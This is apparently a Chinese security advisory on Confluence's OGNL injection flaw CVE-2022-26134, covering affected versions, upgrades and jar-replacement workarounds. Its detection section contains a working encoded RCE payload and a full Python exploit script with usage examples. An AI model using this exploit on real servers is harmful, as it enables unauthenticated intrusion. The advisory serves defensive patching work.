一、漏洞概述
近日,Atlassian官方发布了Confluence Server和Data Center OGNL 注入漏洞(CVE-2022-26134)的安全公告,远程攻击者在未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,CVSS评分为10。目前该漏洞细节与PoC已被公开披露,且被检测到存在在野利用。请相关用户尽快采取措施进行防护。
Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。
二、影响范围
受影响版本
- 1.3.0 <= Confluence Server and Data Center < 7.4.17
- 7.13.0 <= Confluence Server and Data Center < 7.13.7
- 7.14.0 <= Confluence Server and Data Center < 7.14.3
- 7.15.0 <= Confluence Server and Data Center < 7.15.2
- 7.16.0 <= Confluence Server and Data Center < 7.16.4
- 7.17.0 <= Confluence Server and Data Center < 7.17.4
- 7.18.0 <= Confluence Server and Data Center < 7.18.1
不受影响版本
- Confluence Server and Data Center 7.4.17
- Confluence Server and Data Center 7.13.7
- Confluence Server and Data Center 7.14.3
- Confluence Server and Data Center 7.15.2
- Confluence Server and Data Center 7.16.4
- Confluence Server and Data Center 7.17.4
- Confluence Server and Data Center 7.18.1
三、 漏洞检测
使用payload进行检测
payload = "%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D".format(command)
poc利用脚本如下:
https://github.com/Nwqda/CVE-2022-26134/blob/master/cve-2022-26134.py
python代码如下:
# -*- coding: utf-8 -*-
# Author: Naqwada (RuptureFarm 1029) <naqwada@pm.me>
# License: MIT License (http://www.opensource.org/licenses/mit-license.php)
# Docs: https://github.com/Naqwa/CVE-2022-26134
# Website: http://samy.link/
# Linkedin: https://www.linkedin.com/in/samy-younsi/
# Note: FOR EDUCATIONAL PURPOSE ONLY.
from bs4 import BeautifulSoup
import requests
import urllib3
import re
import sys
urllib3.disable_warnings()
def banner():
CVE_2022_26134Logo = """
_______ ________
/ ____/ | / / ____/
/ / | | / / __/
/ /___ | |/ / /___
\____/ |___/_____/___ ___ _____________ __ __
|__ \ / __ \__ \|__ \ |__ \ / ___< /__ // // /
__/ // / / /_/ /__/ /_______/ // __ \/ / /_ </ // /_
/ __// /_/ / __// __/_____/ __// /_/ / /___/ /__ __/
/____/\____/____/____/ /____/\____/_//____/ /_/
\033[1;91mCVE-2022-26134 - OGNL injection vulnerability\033[1;m
Author: \033[1;92mNaqwada\033[1;m
RuptureFarm 1029
FOR EDUCATIONAL PURPOSE ONLY.
"""
return print('\033[1;94m{}\033[1;m'.format(CVE_2022_26134Logo))
def check_target_version(host):
try:
response = requests.get("{}/login.action".format(host), verify=False, timeout=8)
if response.status_code == 200:
filter_version = re.findall("<span id='footer-build-information'>.*</span>", response.text)
if len(filter_version) >= 1:
version = filter_version[0].split("'>")[1].split('</')[0]
return version
else:
return False
else:
return host
except:
return False
def send_payload(host, command):
payload = "%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D".format(command)
response = requests.get("{}/{}/".format(host, payload), verify=False, allow_redirects=False)
try:
if response.status_code == 302:
return response.headers["X-Cmd-Response"]
else:
return "This target does not seem to be vulnerable."
except:
return "This target does not seem to be vulnerable."
def main():
banner()
if len(sys.argv) < 3:
print("\033[1;94mHow to use:\033[1;m")
print("python3 {} https://target.com cmd".format(sys.argv[0]))
print("ex: python3 {} https://target.com id".format(sys.argv[0]))
print("ex: python3 {} https://target.com 'ps aux'".format(sys.argv[0]))
return
target = sys.argv[1]
cmd = sys.argv[2]
version = check_target_version(target)
if version:
print("Confluence target version: \033[1;94m{}\033[1;m".format(version))
else:
print("Can't find the used version for this target. Is the target offline?")
return
exec_payload = send_payload(target, cmd)
print(exec_payload)
if __name__ == "__main__":
main()
使用脚本验证存在漏洞的站点,验证成功:
四、漏洞防护
4.1 官方升级
官方建议用户升级至最新版本,以保证服务的安全性及稳定性。下载链接:https://www.atlassian.com/software/confluence/download-archives
可参考下表,升级至对应修复版本:
受影响版本 | 修复版本 |
1.3.0 – 7.4.16 | 7.4.17 |
7.13.0 – 7.13.6 | 7.13.7 |
7.14.0 – 7.14.2 | 7.14.3 |
7.15.0 – 7.15.1 | 7.15.2 |
7.16.0 – 7.16.3 | 7.16.4 |
7.17.0 – 7.17.3 | 7.17.4 |
7.18.0 | 7.18.1 |
4.2 临时防护措施
若相关用户暂时无法进行升级操作,也可通过以下步骤来缓解该问题:
对于 Confluence 7.15.0 – 7.18.0:
如果在集群中运行 Confluence,则需要在每个节点上重复此过程。您不需要关闭整个集群。
1、关闭 Confluence。
2、下载 xwork-1.0.3-atlassian-10.jar 到Confluence服务器。链接:
https://packages.atlassian.com/maven-internal/opensymphony/xwork/1.0.3-atlassian-10/xwork-1.0.3-atlassian-10.jar
3、将xwork-1.0.3-atlassian-8.jar删除或移出Confluence 安装目录。文件路径:
<confluence-install>/confluence/WEB-INF/lib/xwork-1.0.3-atlassian-8.jar
注意:请用户不要在该目录中留下旧JAR文件的副本。
4、将下载的xwork-1.0.3-atlassian-10.jar文件复制到以下目录中。目录路径:
<confluence-install>/confluence/WEB-INF/lib/
5、检查xwork-1.0.3-atlassian-10.jar文件权限是否与同一目录中的其他文件相同。
6、重启 Confluence。
请记住,如果您在集群中运行 Confluence,请确保在所有节点上运行此脚本。
对于Confluence 7.0.0 – Confluence 7.14.2:
如果在集群中运行 Confluence,则需要在每个节点上重复此过程。您不需要关闭整个集群。
1、关闭 Confluence。
2、下载 xwork-1.0.3-atlassian-10.jar、webwork-2.1.5-atlassian-4.jar和CachedConfigurationProvider.class 三个文件到 Confluence Windows 服务器。链接分别为:
https://packages.atlassian.com/maven-internal/opensymphony/xwork/1.0.3-atlassian-10/xwork-1.0.3-atlassian-10.jar
https://packages.atlassian.com/maven-internal/opensymphony/webwork/2.1.5-atlassian-4/webwork-2.1.5-atlassian-4.jar
https://confluence.atlassian.com/doc/files/1130377146/1137639562/3/1654274890463/CachedConfigurationProvider.class
3、将xwork-1.0.3.6.jar与webwork-2.1.5-atlassian-3.jar删除或移出Confluence 安装目录。文件路径分别为:
<confluence-install>/confluence/WEB-INF/lib/xwork-1.0.3.6.jar
<confluence-install>/confluence/WEB-INF/lib/webwork-2.1.5-atlassian-3.jar
注意:请用户不要在该目录中留下以上旧JAR文件的副本。
4、将下载的xwork-1.0.3-atlassian-10.jar文件复制到以下目录中。目录路径:
<confluence-install>/confluence/WEB-INF/lib/
5、将下载的webwork-2.1.5-atlassian-4.jar文件复制到以下目录中。目录路径:
<confluence-install>/confluence/WEB-INF/lib/
6、检查下载的新文件权限是否与同一目录中的其他文件相同。
7、切换到以下目录
<confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup
(1)在setup目录下创建一个名为webwork的新目录
(2)将CachedConfigurationProvider.class复制到创建好的webwork目录中。目录路径:
<confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup/webwork
(3)检查CachedConfigurationProvider.class文件权限是否与同一目录中的其他文件相同。
8、重启 Confluence。
请记住,如果您在集群中运行 Confluence,请确保在所有节点上运行此脚本。